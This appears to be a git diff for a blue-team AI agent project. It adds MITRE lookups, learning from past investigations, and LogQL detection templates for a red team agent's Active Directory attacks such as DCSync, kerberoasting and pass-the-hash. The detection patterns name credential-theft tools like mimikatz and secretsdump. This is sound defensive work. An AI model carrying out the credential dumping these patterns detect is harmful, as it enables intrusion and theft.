scope." - ) - - # Validate hosts were investigated - if not self.state.queried_hosts and not affected_hosts: - errors.append( - "ERROR: No hosts investigated. Use track_host_investigation() " - "to investigate affected hosts before completing." - ) - - # Validate affected_hosts is not empty - if not affected_hosts: - errors.append( - "ERROR: affected_hosts is required. Provide the list of " - "hosts/IPs involved in the attack." - ) - - # Validate affected_users is not empty - if not affected_users: - errors.append( - "ERROR: affected_users is required. Provide the list of " - "user accounts involved in the attack." - ) - - # Validate attack_timeframe is specific - if not attack_timeframe or len(attack_timeframe) < 10: - errors.append( - "ERROR: attack_timeframe must be specific (e.g., '2024-01-08 04:37-04:43 UTC'). " - "This should reflect the ACTUAL event timestamps from your investigation." - ) - - # Validate synopsis is substantive - if len(attack_synopsis) < 100: - errors.append( - "ERROR: attack_synopsis too short. Provide a detailed description " - "of the attack chain including: initial access, techniques used, " - "and impact." - ) - - # Validate evidence was collected - if len(self.state.evidence) < 2: - errors.append( - f"ERROR: Insufficient evidence ({len(self.state.evidence)} items). " - "Continue investigation to gather more evidence." - ) - - # If errors, return them all - if errors: - dn.log_metric("completion_validation_failed", 1) - return "\n\n".join(errors) - - # All validations passed + logger.info(f"Investigation completed at '{self.state.stage.value}' stage") + + # Store attack synopsis if provided + if attack_synopsis: + self.state.attack_synopsis = attack_synopsis + logger.info(f"Attack synopsis recorded: {attack_synopsis[:100]}...") + + # Process recommendations + if recommendations: + self.state.recommendations.extend(recommendations) + logger.info(f"Added {len(recommendations)} recommendations") + + # Auto-extract recommendations from alert annotations if none provided + if not self.state.recommendations: + alert_annotations = self.state.alert.get("annotations", {}) + response_guidance = alert_annotations.get("response", "") + if response_guidance: + import re + + steps = re.split(r"\d+\.\s+", response_guidance) + extracted_recs = [s.strip() for s in steps if s.strip()] + if extracted_recs: + self.state.recommendations.extend(extracted_recs) + logger.info(f"Auto-extracted {len(extracted_recs)} recommendations from alert") + + # Auto-generate synopsis if not provided and we have evidence + if not self.state.attack_synopsis and self.state.evidence: + self._generate_fallback_synopsis() + + # Record completion dn.log_metric("investigation_completed", 1) dn.log_output( "completion_summary", { "summary": summary, - "attack_synopsis": attack_synopsis, - "recommendations": recommendations, - "confidence": confidence, - "affected_hosts": affected_hosts, - "affected_users": affected_users, - "attack_timeframe": attack_timeframe, + "attack_synopsis": self.state.attack_synopsis, + "recommendations": self.state.recommendations, "evidence_count": len(self.state.evidence), "timeline_events": len(self.state.timeline), "hosts_investigated": list(self.state.queried_hosts), "users_investigated": list(self.state.queried_users), + "techniques_identified": list(self.state.identified_techniques), }, ) - logger.success("Investigation completed") + logger.success(f"Investigation completed: {summary[:100]}...") return "Investigation completed. Report will be generated." + def _generate_fallback_synopsis(self) -> None: + """Generate a basic synopsis from evidence if none provided.""" + if not self.state: + return + + parts = [] + + alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert") + severity = self.state.alert.get("labels", {}).get("severity", "unknown") + starts_at = self.state.alert.get("startsAt", "") + + parts.append(f"{severity.upper()} alert: {alert_name}") + + if starts_at: + parts.append(f"Alert triggered at {starts_at}.") + + if self.state.identified_techniques: + techniques = ", ".join(list(self.state.identified_techniques)[:3]) + parts.append(f"MITRE techniques identified: {techniques}.") + + if self.state.queried_hosts: + hosts = ", ".join(list(self.state.queried_hosts)[:3]) + parts.append(f"Hosts involved: {hosts}.") + + if self.state.queried_users: + users = ", ".join(list(self.state.queried_users)[:3]) + parts.append(f"Users involved: {users}.") + + if self.state.evidence: + parts.append(f"{len(self.state.evidence)} evidence items collected.") + high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5] + if high_level: + parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.") + + self.state.attack_synopsis = " ".join(parts) + @dn.tool() # type: ignore[untyped-decorator] async def escalate_investigation( diff --git a/src/ares/tools/blue/grafana.py b/src/ares/tools/blue/grafana.py index bde0bee1..c466f3d9 100644 --- a/src/ares/tools/blue/grafana.py +++ b/src/ares/tools/blue/grafana.py @@ -4,6 +4,7 @@ import shutil import subprocess # nosec B404 from pathlib import Path +from typing import Any import dreadnode as dn import httpx @@ -130,7 +131,7 @@ def find_mcp_grafana() -> str: async def connect_grafana_mcp( grafana_url: str | None = None, grafana_api_key: str | None = None, -): # type: ignore[no-untyped-def] +) -> Any: """ Connect to Grafana MCP server via Rigging. diff --git a/src/ares/tools/blue/investigation.py b/src/ares/tools/blue/investigation.py index 187ed394..3dd7f841 100644 --- a/src/ares/tools/blue/investigation.py +++ b/src/ares/tools/blue/investigation.py @@ -32,14 +32,20 @@ class InvestigationTools(Toolset): # type: ignore[misc] Attributes: state: Current investigation state being managed. + mitre_client: MITRE ATT&CK client for technique lookups. """ state: InvestigationState | None = None + mitre_client: MITREAttackClient | None = None def set_state(self, state: InvestigationState): """Set the investigation state (called by orchestrator).""" self.state = state + def set_mitre_client(self, client: MITREAttackClient): + """Set the MITRE client for technique lookups.""" + self.mitre_client = client + @dn.tool_method # type: ignore[untyped-decorator] def record_evidence( self, @@ -116,6 +122,8 @@ def record_evidence( if mitre_techniques: self.state.identified_techniques.update(mitre_techniques) + # Look up technique names and tactics + self._resolve_technique_metadata(mitre_techniques) dn.log_output(f"evidence_{evidence_id}", ev.to_dict()) dn.log_metric("evidence_count", 1, mode="count") @@ -127,6 +135,24 @@ def record_evidence( return evidence_id + def _resolve_technique_metadata(self, technique_ids: list[str]) -> None: + """Look up and cache technique names and tactics.""" + if not self.state or not self.mitre_client: + return + + for tech_id in technique_ids: + # Skip if already resolved + if tech_id in self.state.technique_names: + continue + + technique = self.mitre_client.get_technique(tech_id) + if technique: + self.state.technique_names[tech_id] = technique.name + self.state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + self.state.identified_tactics.add(technique.tactic) + logger.debug(f"Resolved technique {tech_id}: {technique.name} ({technique.tactic})") + @dn.tool_method # type: ignore[untyped-decorator] def add_timeline_event( self, diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py new file mode 100644 index 00000000..accc04d9 --- /dev/null +++ b/src/ares/tools/blue/learning.py @@ -0,0 +1,343 @@ +""" +Learning tools for querying past investigations and improving detection. + +These tools allow the agent to learn from previous investigations +and apply that knowledge to new alerts. +""" + +from typing import Any + +import dreadnode as dn +from dreadnode.agent.tools.base import Toolset +from loguru import logger + +from ares.core.persistence import InvestigationStore, get_investigation_store + + +class LearningTools(Toolset): # type: ignore[misc] + """Tools for learning from past investigations. + + Provides access to historical investigation data, query effectiveness + statistics, and false positive patterns. + + Attributes: + store: Optional investigation store (uses global store if not provided). + """ + + store: InvestigationStore | None = None + + def get_store(self) -> InvestigationStore: + """Get the investigation store, initializing if needed.""" + if self.store is None: + self.store = get_investigation_store() + return self.store + + @dn.tool_method # type: ignore[untyped-decorator] + async def find_similar_investigations( + self, + alert_name: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 5, + ) -> dict[str, Any]: + """Find similar past investigations to learn from. + + Use this at the start of an investigation to see how similar alerts + were handled in the past and what queries were effective. + + Args: + alert_name: Name of the current alert + technique_id: MITRE ATT&CK technique ID (e.g., "T1003.001") + severity: Alert severity level + limit: Maximum number of results (default 5) + + Returns: + Dictionary containing similar investigations and their outcomes + """ + dn.log_metric("learning_similar_lookup", 1, mode="count") + logger.info( + f"Looking up similar investigations: alert={alert_name}, technique={technique_id}" + ) + + similar = self.get_store().find_similar_investigations( + alert_name=alert_name, + technique_id=technique_id, + severity=severity, + limit=limit, + ) + + if not similar: + return { + "found": False, + "message": "No similar investigations found. This may be a new alert type.", + "investigations": [], + } + + results = [] + for sim in similar: + inv = sim.investigation + results.append( + { + "investigation_id": inv.investigation_id, + "alert_name": inv.alert_name, + "technique_id": inv.technique_id, + "similarity_score": sim.similarity_score, + "matching_factors": sim.matching_factors, + "outcome": { + "status": inv.status, + "evidence_count": inv.evidence_count, + "highest_pyramid_level": inv.highest_pyramid_level, + "is_true_positive": inv.is_true_positive, + }, + "duration_seconds": inv.duration_seconds, + "effective_queries": inv.effective_queries[:3], # Top 3 effective queries + "techniques_identified": inv.techniques_identified, + } + ) + + # Add summary guidance + completed_count = sum(1 for s in similar if s.investigation.status == "completed") + avg_evidence = sum(s.investigation.evidence_count for s in similar) / len(similar) + + true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False) + + return { + "found": True, + "count": len(results), + "summary": { + "completion_rate": f"{completed_count / len(similar) * 100:.0f}%", + "avg_evidence_count": round(avg_evidence, 1), + "true_positives": true_positive_count, + "false_positives": false_positive_count, + }, + "investigations": results, + "guidance": self._generate_guidance(similar), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_effective_queries( + self, + alert_name: str | None = None, + limit: int = 10, + ) -> dict[str, Any]: + """Get the most effective queries for this type of alert. + + Returns queries that have historically produced evidence, + ranked by effectiveness. + + Args: + alert_name: Filter by alert type (optional) + limit: Maximum number of queries to return + + Returns: + Dictionary with effective queries and their statistics + """ + dn.log_metric("learning_query_lookup", 1, mode="count") + logger.info(f"Looking up effective queries for alert: {alert_name}") + + effective = self.get_store().get_effective_queries( + alert_type=alert_name, + min_evidence_rate=0.2, # At least 20% evidence rate + limit=limit, + ) + + if not effective: + return { + "found": False, + "message": "No query effectiveness data available yet.", + "queries": [], + } + + queries = [] + for qe in effective: + queries.append( + { + "query_pattern": qe.query_pattern, + "total_uses": qe.total_executions, + "success_rate": f"{qe.success_rate * 100:.0f}%", + "evidence_rate": f"{qe.evidence_rate * 100:.0f}%", + "used_for_alerts": qe.alert_types[:5], # Limit alert types shown + } + ) + + return { + "found": True, + "count": len(queries), + "queries": queries, + "recommendation": ( + "Use these queries as starting points. They have historically " + "produced evidence for similar alerts. Adapt the patterns to " + "your specific investigation context." + ), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def check_false_positive_pattern( + self, + alert_name: str, + alert_fingerprint: str | None = None, + ) -> dict[str, Any]: + """Check if this alert matches a known false positive pattern. + + Use this to quickly identify if an alert is likely a false positive + based on historical data. + + Args: + alert_name: Name of the alert + alert_fingerprint: Unique fingerprint/rule UID of the alert + + Returns: + Dictionary with false positive assessment + """ + dn.log_metric("learning_fp_check", 1, mode="count") + logger.info(f"Checking false positive patterns for: {alert_name}") + + # Check for similar false positives + similar = self.get_store().find_similar_investigations( + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + limit=20, + ) + + if not similar: + return { + "is_known_pattern": False, + "message": "No historical data for this alert type.", + "confidence": "low", + } + + # Count true/false positives + true_positives = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positives = sum(1 for s in similar if s.investigation.is_true_positive is False) + unlabeled = len(similar) - true_positives - false_positives + + # Calculate false positive likelihood + if true_positives + false_positives > 0: + fp_rate = false_positives / (true_positives + false_positives) + else: + fp_rate = 0.0 + + # Check known FP patterns + fp_patterns = self.get_store().get_false_positive_patterns(min_occurrences=2) + matching_pattern = None + for pattern in fp_patterns: + if pattern["alert_name"] == alert_name: + matching_pattern = pattern + break + + if matching_pattern and matching_pattern["occurrences"] >= 3: + return { + "is_known_pattern": True, + "confidence": "high", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "occurrences": matching_pattern["occurrences"], + "pattern": matching_pattern, + "recommendation": ( + "This alert has been marked as false positive multiple times. " + "Consider quick validation and early completion if indicators match." + ), + } + + if fp_rate > 0.7: + return { + "is_known_pattern": True, + "confidence": "medium", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "recommendation": ( + "This alert type has a high false positive rate. " + "Prioritize quick validation queries before deep investigation." + ), + } + + return { + "is_known_pattern": False, + "confidence": "medium" if unlabeled < len(similar) / 2 else "low", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": unlabeled, + "message": "No strong false positive pattern detected. Proceed with normal investigation.", + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_investigation_statistics(self) -> dict[str, Any]: + """Get overall investigation statistics. + + Returns aggregated statistics about past investigations, + useful for understanding overall detection performance. + + Returns: + Dictionary with investigation statistics + """ + dn.log_metric("learning_stats_lookup", 1, mode="count") + + stats = self.get_store().get_statistics() + + return { + "total_investigations": stats["total_investigations"], + "status_distribution": stats["status_distribution"], + "performance": { + "avg_evidence_count": stats["avg_evidence_count"], + "avg_pyramid_level": stats["avg_pyramid_level"], + "avg_duration_seconds": stats["avg_duration_seconds"], + }, + "query_insights": { + "total_query_patterns": stats["total_query_patterns"], + "avg_evidence_rate": f"{stats['avg_query_evidence_rate']}%", + }, + "labeling": stats["labeling"], + } + + def _generate_guidance(self, similar: list) -> str: + """Generate investigation guidance based on similar investigations.""" + if not similar: + return "No historical guidance available." + + # Find most successful investigation + completed = [s for s in similar if s.investigation.status == "completed"] + if not completed: + return "Previous investigations of this type did not complete successfully." + + # Get investigation with most evidence + best = max(completed, key=lambda x: x.investigation.evidence_count) + + guidance_parts = [] + + if best.investigation.evidence_count > 0: + guidance_parts.append( + f"Past investigations found an average of " + f"{sum(s.investigation.evidence_count for s in completed) / len(completed):.1f} " + f"evidence items." + ) + + if best.investigation.effective_queries: + guidance_parts.append( + f"Effective queries to try: {', '.join(best.investigation.effective_queries[:2])}" + ) + + # Check for common outcomes + true_positive_rate = ( + sum(1 for s in similar if s.investigation.is_true_positive is True) / len(similar) * 100 + if similar + else 0 + ) + + if true_positive_rate > 70: + guidance_parts.append( + f"This alert type has a {true_positive_rate:.0f}% true positive rate - " + "likely worth thorough investigation." + ) + elif true_positive_rate < 30: + guidance_parts.append( + f"This alert type has only a {true_positive_rate:.0f}% true positive rate - " + "consider quick validation first." + ) + + return ( + " ".join(guidance_parts) + if guidance_parts + else "Proceed with standard investigation approach." + ) diff --git a/src/ares/tools/blue/observability.py b/src/ares/tools/blue/observability.py index 8c405ddf..380aa3a5 100644 --- a/src/ares/tools/blue/observability.py +++ b/src/ares/tools/blue/observability.py @@ -76,7 +76,6 @@ async def query_logs( query_logs_around_timestamp: For time-window queries around a specific event. get_label_values: For discovering available log labels. """ - # Validate query to prevent empty-compatible regex errors if '=~".*"' in logql or "=~'.*'" in logql: return { "status": "error", @@ -109,7 +108,6 @@ async def query_logs( except httpx.HTTPError as e: logger.error(f"Loki query failed: {e}") logger.error(f"Failed query was: {logql}") - # Return detailed error for the agent to learn from return { "status": "error", "error": str(e), @@ -185,7 +183,6 @@ async def query_logs_progressive( limit=limit, ) - # Check if we got results data = result.get("data", {}) results = data.get("result", []) if results: diff --git a/src/ares/tools/blue/query_templates.py b/src/ares/tools/blue/query_templates.py new file mode 100644 index 00000000..105f0738 --- /dev/null +++ b/src/ares/tools/blue/query_templates.py @@ -0,0 +1,1966 @@ +"""Pre-built query templates for detecting red team attack patterns. + +Provides ready-to-use LogQL queries mapped to MITRE ATT&CK techniques, +specifically designed to detect attacks performed by the Ares red team agent. +""" + +from datetime import datetime, timedelta, timezone +from typing import Any + +import dreadnode as dn +import httpx +from dreadnode.agent.tools.base import Toolset +from loguru import logger + + +class QueryTemplateTools(Toolset): # type: ignore[misc] + """Pre-built query templates for detecting red team attack patterns. + + These templates encode detection logic for Active Directory attacks, + specifically aligned with the techniques used by the Ares red team agent: + - Network enumeration (nmap, user/share enumeration) + - Credential access (secretsdump, kerberoasting, AS-REP roasting) + - Lateral movement (pass-the-hash, psexec, wmi) + - Privilege escalation (ADCS, delegation, golden ticket) + + Attributes: + loki_url: Base URL of the Loki instance. + timeout: HTTP request timeout in seconds. + """ + + loki_url: str + timeout: int = 30 + + async def _query_loki( + self, + logql: str, + start_time: str, + end_time: str, + limit: int = 500, + ) -> dict[str, Any]: + """Execute a LogQL query against Loki.""" + # Validate query to prevent empty-compatible regex errors + if '=~".*"' in logql or "=~'.*'" in logql: + return { + "status": "error", + "error": "Query contains empty-compatible regex '.*'. Use '.+' instead.", + } + + try: + async with httpx.AsyncClient(timeout=self.timeout) as client: + response = await client.get( + f"{self.loki_url}/loki/api/v1/query_range", + params={ + "query": logql, + "start": start_time, + "end": end_time, + "limit": limit, + }, + ) + response.raise_for_status() + return response.json() + except httpx.HTTPError as e: + logger.error(f"Loki query failed: {e}") + return {"status": "error", "error": str(e), "data": {"result": []}} + + def _get_time_range(self, hours_back: int = 24) -> tuple[str, str]: + """Get ISO8601 time range for queries.""" + now = datetime.now(timezone.utc) + start = now - timedelta(hours=hours_back) + return start.isoformat(), now.isoformat() + + def _count_results(self, result: dict) -> int: + """Count total log entries in result.""" + streams = result.get("data", {}).get("result", []) + return sum(len(s.get("values", [])) for s in streams) + + # ========================================================================= + # RECONNAISSANCE & DISCOVERY (TA0007) + # Maps to: nmap_scan, enumerate_users, enumerate_shares + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_port_scanning( + self, + target_ip: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect network port scanning activity (nmap, masscan). + + Detects reconnaissance performed by red team's nmap_scan tool. + Looks for rapid connection attempts to multiple ports. + + MITRE ATT&CK: T1046 (Network Service Discovery) + + Args: + target_ip: Optional IP to focus detection on. + hours_back: Hours of logs to search (default 24). + + Returns: + Query results with port scanning indicators. + """ + dn.log_metric("query_template_port_scan", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Detect nmap signatures, SYN scans, rapid connection attempts + logql = '{job=~".+"} |~ "(?i)(nmap|masscan|syn.*scan|port.*scan|connection.*refused)"' + + if target_ip: + logql += f' |~ "{target_ip}"' + + logger.info(f"Port scanning detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "port_scanning" + result["_mitre_technique"] = "T1046" + result["_red_team_tool"] = "nmap_scan" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_user_enumeration( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Active Directory user enumeration. + + Detects reconnaissance performed by red team's enumerate_users tool (netexec --users). + Looks for LDAP queries, net user commands, and SMB-based enumeration. + + MITRE ATT&CK: T1087.002 (Account Discovery: Domain Account) + + Args: + domain_controller: Optional DC hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with user enumeration indicators. + """ + dn.log_metric("query_template_user_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662: Object access (LDAP queries) + # Event 4798: User's group membership enumerated + # Event 4799: Security-enabled group membership enumerated + # netexec, crackmapexec, ldapsearch signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|4798|4799|samr|lsarpc|ldap|net.*user|net.*group)"' + ' |~ "(?i)(enumerate|query|lookup|search|crackmapexec|netexec|ldapsearch)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"User enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "user_enumeration" + result["_mitre_technique"] = "T1087.002" + result["_red_team_tool"] = "enumerate_users" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_share_enumeration( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect SMB share enumeration. + + Detects reconnaissance performed by red team's enumerate_shares tool (netexec --shares). + Looks for share listing, access attempts, and smbclient activity. + + MITRE ATT&CK: T1135 (Network Share Discovery) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with share enumeration indicators. + """ + dn.log_metric("query_template_share_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5140: Network share accessed + # Event 5145: Detailed file share access + # smbclient, netexec signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5140|5145|srvsvc|netuse|net.*share|net.*view)"' + ' |~ "(?i)(smbclient|crackmapexec|netexec|enum.*share|share.*enum)"' + ) + + if target_host: + logql += f' |~ "(?i){target_host}"' + + logger.info(f"Share enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "share_enumeration" + result["_mitre_technique"] = "T1135" + result["_red_team_tool"] = "enumerate_shares" + + return result + + # ========================================================================= + # CREDENTIAL ACCESS (TA0006) + # Maps to: secretsdump, kerberoast, asrep_roast, crack_with_hashcat + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_secretsdump( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect credential dumping via impacket-secretsdump. + + Detects red team's secretsdump tool which extracts: + - SAM database (local accounts) + - LSA secrets + - NTDS.dit (domain accounts) + - Cached domain credentials + + MITRE ATT&CK: T1003 (OS Credential Dumping) + Sub-techniques: T1003.001 (LSASS), T1003.002 (SAM), T1003.003 (NTDS), T1003.004 (LSA) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with secretsdump indicators. + """ + dn.log_metric("query_template_secretsdump", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # DRSUAPI for DCSync, SAMR for SAM dump, registry access for LSA secrets + # Event 4624 Type 3 from unusual source, Event 4662 (DS-Replication-Get-Changes) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(drsuapi|samr|secretsdump|lsadump|ntds\\.dit|sam.*dump)"' + ' |~ "(?i)(replicate|1131f6|ds-replication|mimikatz|impacket)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Secretsdump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "secretsdump" + result["_mitre_technique"] = "T1003" + result["_mitre_subtechniques"] = ["T1003.001", "T1003.002", "T1003.003", "T1003.004"] + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_dcsync( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect DCSync attack (secretsdump against DC). + + DCSync allows attackers with replication rights to extract all domain credentials + including krbtgt hash (enables golden ticket). Critical to detect. + + MITRE ATT&CK: T1003.006 (DCSync) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with DCSync indicators. + """ + dn.log_metric("query_template_dcsync", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662 with specific GUIDs for replication + # 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes + # 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes-All + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|dcsync|ds-replication|1131f6aa|1131f6ad)"' + ' |~ "(?i)(replication|drsuapi|directory.*service.*access)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"DCSync detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "dcsync" + result["_mitre_technique"] = "T1003.006" + result["_red_team_tool"] = "secretsdump" + result["_severity"] = "critical" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_kerberoasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberoasting attack (impacket-GetUserSPNs). + + Detects red team's kerberoast tool which requests TGS tickets for + service accounts with SPNs. These tickets can be cracked offline. + + MITRE ATT&CK: T1558.003 (Kerberoasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with Kerberoasting indicators. + """ + dn.log_metric("query_template_kerberoast", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769: Kerberos Service Ticket Request + # Look for: RC4 encryption (type 0x17), many TGS requests, SPN patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4769|kerberos.*ticket|tgs.*request|getuserspn)"' + ' |~ "(?i)(service.*ticket|spn|rc4|0x17|kerberoast)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Kerberoasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "kerberoasting" + result["_mitre_technique"] = "T1558.003" + result["_red_team_tool"] = "kerberoast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_asrep_roasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect AS-REP Roasting attack (impacket-GetNPUsers). + + Detects red team's asrep_roast tool which targets accounts with + 'Do not require Kerberos preauthentication' enabled. + + MITRE ATT&CK: T1558.004 (AS-REP Roasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with AS-REP roasting indicators. + """ + dn.log_metric("query_template_asrep", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4768: Kerberos TGT Request (AS-REQ) + # Event 4771: Kerberos Pre-Authentication Failed + # Look for requests without pre-auth, RC4 encryption + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4768|4771|as-req|getnpusers|asrep)"' + ' |~ "(?i)(pre.*auth|tgt.*request|roast|dont.*require.*preauth)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"AS-REP roasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "asrep_roasting" + result["_mitre_technique"] = "T1558.004" + result["_red_team_tool"] = "asrep_roast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_brute_force( + self, + target_host: str | None = None, + hours_back: int = 24, + threshold: int = 10, + ) -> dict[str, Any]: + """Detect brute force and password spray attacks. + + Detects credential stuffing attempts from red team's authentication tests. + Looks for multiple failed logins from same source or against multiple accounts. + + MITRE ATT&CK: T1110 (Brute Force), T1110.003 (Password Spraying) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + threshold: Minimum failures to flag (default 10). + + Returns: + Query results with auth failure analysis. + """ + dn.log_metric("query_template_brute_force", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4625: Failed Logon + # Event 4771: Kerberos Pre-Auth Failed + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4625|4771|failed|invalid|denied)"' + ' |~ "(?i)(logon|auth|password|credential)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Brute force detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + + # Analyze patterns + total_failures = self._count_results(result) + result["_analysis"] = { + "total_failures": total_failures, + "is_likely_attack": total_failures >= threshold, + "recommendation": ( + "High auth failure volume - investigate source IPs and target accounts" + if total_failures >= threshold + else "Normal failure volume" + ), + } + result["_query_template"] = "brute_force" + result["_mitre_technique"] = "T1110" + + return result + + # ========================================================================= + # LATERAL MOVEMENT (TA0008) + # Maps to: domain_admin_checker (pass-the-hash), netexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_pass_the_hash( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Pass-the-Hash attacks. + + Detects red team's domain_admin_checker using NTLM hashes for auth. + Looks for NTLM authentications without corresponding password usage. + + MITRE ATT&CK: T1550.002 (Pass the Hash) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with PtH indicators. + """ + dn.log_metric("query_template_pth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4624 with NTLM auth (LogonType 3 or 9, NtLmSsp) + # Look for hash-based auth patterns from netexec/crackmapexec + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4624|ntlm|ntlmssp|pass.*the.*hash)"' + ' |~ "(?i)(logon.*type.*3|network.*logon|crackmapexec|netexec)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Pass-the-Hash detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "pass_the_hash" + result["_mitre_technique"] = "T1550.002" + result["_red_team_tool"] = "domain_admin_checker" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_lateral_movement( + self, + source_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect lateral movement patterns. + + Detects various lateral movement techniques used during post-exploitation: + - PSExec service creation + - WMI execution + - WinRM/PowerShell remoting + - SMB admin share access + + MITRE ATT&CK: T1021 (Remote Services) + + Args: + source_host: Optional source to pivot from. + hours_back: Hours of logs to search. + + Returns: + Query results with lateral movement indicators. + """ + dn.log_metric("query_template_lateral", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 7045: Service installed + # Event 4648: Explicit credential logon + # Event 4624 Type 3: Network logon + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|4648|psexec|wmic|winrm|powershell.*-session)"' + ' |~ "(?i)(admin\\$|c\\$|ipc\\$|service.*install|remote.*execution)"' + ) + + if source_host: + logql += f' |~ "(?i){source_host}"' + + logger.info(f"Lateral movement detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "lateral_movement" + result["_mitre_technique"] = "T1021" + result["_mitre_subtechniques"] = ["T1021.002", "T1021.003", "T1021.006"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_smb_file_access( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious file access on SMB shares. + + Detects red team's share pilfering tools (enumerate_share_files, download_file_content). + 